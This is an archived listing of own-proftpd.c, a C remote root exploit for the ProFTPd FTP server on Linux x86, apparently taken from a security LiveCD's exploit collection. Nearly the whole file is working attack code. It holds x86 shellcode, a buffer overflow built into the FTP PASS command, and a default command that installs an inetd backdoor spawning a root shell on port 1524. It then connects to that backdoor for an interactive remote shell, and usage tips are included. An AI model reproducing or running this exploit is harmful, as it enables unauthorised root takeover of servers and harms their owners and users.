Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / proftpd / own-proftpd.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 10KB | 452 lines

/* * Copyright (c) 1999 anathema <anathema@hack.co.za> * All rights reserved. * * own-proftpd.c * ProFTPd remote root overflow (linux x86) * * This is *NOT* the overflow mentioned on Bugtraq, this is another * unpublished overflow within the ProFTPd code. * * Try an alignment value of 1 to start with: * despair:~# ./own-proftpd onyx -a 1 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <ctype.h> #include <stdarg.h> #include <string.h> #include <memory.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #define FTP_PORT 21 #define BIND_PORT 1500 #define BD_PORT 1524 #define ADDR 0xbffff424 #define RETPOS 932 char c0de[] = "\x29\xc0\x29\xdb\x29\xc9\xb0\x46\xcd\x80\xeb\x64\x5b\x89\xd9\x80\xc1\x0f\x39" "\xd9\x7c\x06\x80\x29\x04\x49\xeb\xf6\x29\xc0\x88\x43\x01\x88\x43\x08\x88\x43" "\x10\x87\xf3\xb0\x0c\x8d\x5e\x07\xcd\x80\xb0\x27\x8d\x1e\x29\xc9\xcd\x80\x29" "\xc0\xb0\x3d\xcd\x80\x29\xc0\xb0\x0c\x8d\x5e\x02\xcd\x80\x29\xc0\x88\x46\x03" "\xb0\x3d\x8d\x5e\x02\xcd\x80\x29\xc0\x8d\x5e\x09\x89\x5b\x08\x89\x43\x0c\x88" "\x43\x07\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\x29\xc0\x40\xcd\x80\xe8\x97" "\xff\xff\xff\xff\xff\xff\x45\x45\x32\x32\x33\x32\x32\x33\x45\x33\x66\x6d\x72" "\x33\x77\x6c"; u_long resolve_host(u_char *host_name) { struct in_addr addr; struct hostent *host_ent; addr.s_addr = inet_addr(host_name); if (addr.s_addr == -1) { host_ent = gethostbyname(host_name); if (!host_ent) return(0); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } void bind_portz(int sock, u_char *cmd) { struct sockaddr_in sin; u_char tmp[4096]; int asock, lsock, flen = 16; asock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (asock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(BIND_PORT); sin.sin_addr.s_addr = INADDR_ANY; if (bind(asock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("bind"); close(asock); exit(-1); } if (listen(asock, 10) == -1) { perror("listen"); close(asock); exit(-1); } lsock = accept(asock, (struct sockaddr *)&sin, &flen); if (lsock == -1) { perror("accept"); close(asock); exit(-1); } memset(tmp, 0, sizeof(tmp)); recv(lsock, tmp, sizeof(tmp), 0); close(asock); close(lsock); write(sock, cmd, strlen(cmd)); exit(0); } u_long getlocalip(void) { u_char host_name[1024]; u_long our_ip; memset(host_name, 0, sizeof(host_name)); if (gethostname(host_name, sizeof(host_name) - 1) == -1) { /* * Up to the caller to check for error. [2000]*/ return(0); } our_ip = resolve_host(host_name); /* * If an error has occurred, resolve_host() will return 0 anyway, * which is what the caller should be checking for. Just return. */ return(our_ip); } static u_char * port_data(void) { static u_char tmp[50]; struct in_addr addr; u_char input[25]; int i = 0; memset(input, 0, sizeof(input)); addr.s_addr = getlocalip(); if (!addr.s_addr) { fprintf(stderr, "Cannot get local IP address.\n"); exit(-1); } strncpy(input, inet_ntoa(addr), sizeof(input) - 1); memset(tmp, 0, sizeof(tmp)); for (; i < strlen(input); i++) { if (input[i] == '.') input[i] = ','; } strcpy(tmp, input); strcat(tmp, ",5,220"); return(tmp); } static u_char * overflow_buf(u_int align, u_int offset) { static u_char buf[4096]; u_long addr = ADDR + offset; u_int retpos = RETPOS + align; int i = 0, j = 0; memset(buf, 0x90, sizeof(buf)); for (i = retpos - strlen(c0de); i < retpos; j++, i++) { buf[i] = c0de[j]; } for (; i < (retpos + 75); i += 5) { buf[i+0] = (addr & 0xff); buf[i+1] = (addr >> 8) & 0xff; buf[i+2] = (addr >> 16) & 0xff; buf[i+3] = (addr >> 16) & 0xff; buf[i+4] = (addr >> 24) & 0xff; } buf[i] = 0; return(buf); } void get_data(int sock) { u_char tmp[4096]; memset(tmp, 0, sizeof(tmp)); recv(sock, tmp, sizeof(tmp), 0); fprintf(stderr, "%s", tmp); } void shellz(u_long dst_ip) { struct sockaddr_in sin; u_char sock_buf[4096]; fd_set fds; int sock; fprintf(stderr,"Waiting for command to execute..\n"); /* * If you don't pause here, the exploit may try to connect() before * the command has executed, and so get ECONNREFUSED. */ sleep(4); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(BD_PORT); sin.sin_addr.s_addr = dst_ip; if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("connecting to backdoor"); close(sock); exit(-1); } fprintf(stderr, "owned\n"); for (;;) { FD_ZERO(&fds); FD_SET(0, &fds); /* STDIN_FILENO */ FD_SET(sock, &fds); select(255, &fds, NULL, NULL, NULL); memset(sock_buf, 0, sizeof(sock_buf)); if (FD_ISSET(sock, &fds)) { if (recv(sock, sock_buf, sizeof(sock_buf), 0) == -1) { fprintf(stderr, "Connection closed by remote host.\n"); close(sock); exit(0); } fprintf(stderr, "%s", sock_buf); } if (FD_ISSET(0, &fds)) /* STDIN_FILENO */ { read(0, sock_buf, sizeof(sock_buf)); /* STDIN_FILENO */ write(sock, sock_buf, strlen(sock_buf)); } } /* NOTREACHED */ } void send_data(int sock, u_char *payload, ...) { u_char tmp[4096]; va_list list; memset(tmp, 0, sizeof(tmp)); va_start(list, payload); vsnprintf(tmp, sizeof(tmp), payload, list); write(sock, tmp, strlen(tmp)); va_end(list); get_data(sock); } void exploit(u_long dst_ip, u_short src_prt, u_short dst_prt, u_int align, u_int offset, int alt_cmd, u_char *exec_cmd, u_char *retr_file) { struct sockaddr_in sin; u_char buf[4096], pdata[50]; int sock; memset(pdata, 0, sizeof(pdata)); strncpy(pdata, port_data(), sizeof(pdata) - 1); memset(buf, 0, sizeof(buf)); strncpy(buf, overflow_buf(align, offset), sizeof(buf) - 1); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } if (!fork()) bind_portz(sock, exec_cmd); if (src_prt) { struct sockaddr_in min; min.sin_family = AF_INET; min.sin_port = htons(src_prt); min.sin_addr.s_addr = INADDR_ANY; if (bind(sock, (struct sockaddr *)&min, sizeof(struct sockaddr)) == -1) { perror("bind"); close(sock); exit(-1); } } sin.sin_family = AF_INET; sin.sin_port = htons(FTP_PORT); sin.sin_addr.s_addr = dst_ip; if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("connecting to ftp daemon"); close(sock); exit(-1); } get_data(sock); send_data(sock, "USER anonymous\n"); send_data(sock, "PASS %s\n", buf); send_data(sock, "PORT %s\n", pdata); send_data(sock, "RETR %s\n", retr_file); if (!alt_cmd) { shellz(dst_ip); /* NOTREACHED */ } sleep(2); fprintf(stderr, "Completed.\n"); exit(0); } void usage(u_char *nomenclature) { fprintf(stderr, "No.\nusage:\t%s dst_host|ip [ -s src_prt ] [ -d dst_prt ]\n" "\t[ -a align ] [ -o offset ] [ -c alt_cmd ] [ -f alt_file ]\n", nomenclature); exit(-1); } int main(int argc, char **argv) { u_long dst_ip = 0; u_short src_prt = 0, dst_prt = FTP_PORT; u_int align = 0, offset = 0; u_char cmd[255], retr_file[255]; int opt = 0, alt_cmd = 0, alt_file = 0; fprintf(stderr, "ProFTPd remote root exploit\n" "Copyright (c) anathema <anathema@hack.co.za>\n"); if (argc < 2) { usage(argv[0]); /* NOTREACHED */ } dst_ip = resolve_host(argv[1]); if (!dst_ip) { fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]); exit(-1); } while ((opt = getopt(argc, argv, "s:d:a:o:c:f:")) != EOF) { switch(opt) { case 's': src_prt = (u_short)atoi(optarg); break; case 'd': dst_prt = (u_short)atoi(optarg); break; case 'a': align = (u_int)atoi(optarg); break; case 'o': offset = (u_int)atoi(optarg); break; case 'c': snprintf(cmd, sizeof(cmd), "\n%s\n", optarg); alt_cmd = 1; break; case 'f': strncpy(retr_file, optarg, sizeof(retr_file) - 1); alt_file = 1; break; default: usage(argv[0]); /* NOTREACHED */ } } if (src_prt < 1024) { /* * If the user wants to specify a privileged source port, s/he * must be root, otherwise bind() will bail with EACCES. [2000]*/ if (getuid() && geteuid()) { fprintf(stderr, "Insufficient privilegez (uid|euid == 0)\n"); exit(-1); } } if (!alt_cmd) { /* * The user hasn't specified an alternative command to run. * Use the default of an ingreslock backdoor. If this is used, * the exploit will automatically connect to it, dropping the * user into a remote shell. [2000]*/ strcpy(cmd, "\necho \"ingreslock stream tcp nowait root /bin/sh sh -i\" >/tmp/x; /usr/sbin/inetd /tmp/x\n"); } if (!alt_file) { /* * No file to RETR(ieve) specified, use a reasonable default. [2000]*/ strcpy(retr_file, "welcome.msg"); } exploit(dst_ip, src_prt, dst_prt, align, offset, alt_cmd, cmd, retr_file); /* NOTREACHED */ } /* www.hack.co.za [2000]*/